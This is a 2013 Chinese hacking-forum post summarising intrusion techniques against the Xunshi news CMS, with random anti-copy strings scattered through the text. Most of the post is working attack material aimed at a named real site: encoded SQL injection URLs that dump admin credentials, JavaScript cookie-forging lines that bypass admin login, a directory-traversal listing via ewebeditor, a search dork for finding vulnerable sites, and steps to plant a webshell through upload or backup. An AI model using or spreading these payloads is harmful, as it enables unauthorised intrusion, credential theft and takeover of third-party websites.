中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]

---

作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘
/ r5 C2 U3 f; X3 Y: z! o, D
& O. C1 Y% f" x0 f5 U2 T9 h在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
+ c: i: u9 M/ H  k( K. z+ A2 o/ {
1 z0 I- f( D8 x7 M3 C/ P" Q5 w. V以下本文总结来自黑防去年第9期杂志上的内容...
8 i+ S1 z# D) j/ |# X
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
; N4 Q7 O6 b0 g% j' R
记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
  i, G3 M5 S' t+ q1 t( ^% i这里一个注入
- X3 K6 X" Z' z9 x7 t1 _
效果如图:
/ i' j& v3 j8 G8 p1 z* a


这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
* B1 W& U3 d- @1 e
7 h3 m# Q3 D1 v* }' o1 _4 _密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去

! C# W8 f$ R% ^9 d3 zjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

# @* {" e: h5 _3 C因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
: T, X, p" M( V4 E+ K
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
2 e- B: p, B( @  |6 @4 I8 W+ L8 y5 D
访问这页面来列目录..步骤如下:
6 [$ l7 z8 p% p. g% J! }$ V) C+ ]
javascript:alert(document.cookie="admindj=1")
) _0 h# p( V8 x. _( o; v
http://www.political-security.co ... asp?id=46&dir=../..

* d& y$ D# y" o' b/ b: O. u效果如图:

3 n0 r$ v! o  x! r: `

( O8 T/ \4 j7 v! @7 Y这样全站目录都能瞧了..找到后台目录..进去..
8 y5 j% x1 X2 Z0 j5 d0 ^
' g, V7 x3 R! t: X! ]那么进了后台怎么拿shell？？上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
8 \1 X9 q: l; I5 `1 j& Z
这个我也碰到过一次..你都可以通过列目录来实现..

% g( c8 w. Q+ f" D' gjavascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... p?action=BackupData

备份ok..

1 F$ p6 ]1 l! N$ W那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
& u2 C+ `: r: T; U
+ ]) s6 S# d8 }# U  Q- M; q在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
" c# |$ r0 q) U) T5 s; S
- }* l, {$ a% \! P+ V& O9 z然后访问此页面进行注入..步骤如下:

javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后请求admin/admin_chk.asp页面

/ J: O7 g1 }$ M输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
1 z0 Q( |/ W) z2 W  t, ^1 k8 L* C
$ ~* Y9 i5 D2 b效果如图所示:
9 [  Y% B: E0 _* X. ?7 {3 \% `
$ G2 Z' j! T8 a

) Y4 g- E. F5 T0 }- R5 ?/ |讯时漏洞2
% A3 K- N$ o/ M& Kgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
1 F7 t6 _9 b4 K" N+ m% d
, [9 d& J) a; \- Q- i1、/admin/admin_news_pl_view.asp?id=1
9 [) w$ F# @& Y* v& \# w//id任意 填入以下语句

$ b: F% X: x1 _% ~2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
# a/ f$ D; d% v3 N
- d5 ~! X8 P& g3 u- \- W* v( A

$ l! Y/ C& u  ?9 ]. i/ r% u3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
& q) s1 H& {: @, S5 b  ~. j0 K


2 l- {2 H  Z: K/ z+ r( U7 Z- F爆出管理员帐号和密码了
6 o5 q& m3 d7 j* j6 o! M, O! I
! \" V2 L  m' Y' I
, T8 S" y8 a5 T0 q% X) X3 K
4、cookies进后台
! P6 b6 L" T/ @2 w& R
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

! n8 M2 H! U4 Q
" v( c+ S0 J1 v, x0 j% _
5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
/ s# E2 t+ p/ G% w3 Y* \
3 u3 a% l# t7 r5 {7 D) s
+ U+ Q# C8 @- H, ]2 k
8 Y  D8 K7 X- F  N7 Z& |1 B6、后台有上传和备份取SHELL不难。
5 E) |" g4 O$ s
- l- P. F7 w2 S$ v+ @, [7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

% p* I; ?8 f% V+ X) C' `逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
  T; A# G. Q! T* t0 [; T0 C+ @* S

2 p  p9 {6 k9 |3 S4 ?' s
3 x6 c. W- C' L" q$ c9 [% R

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2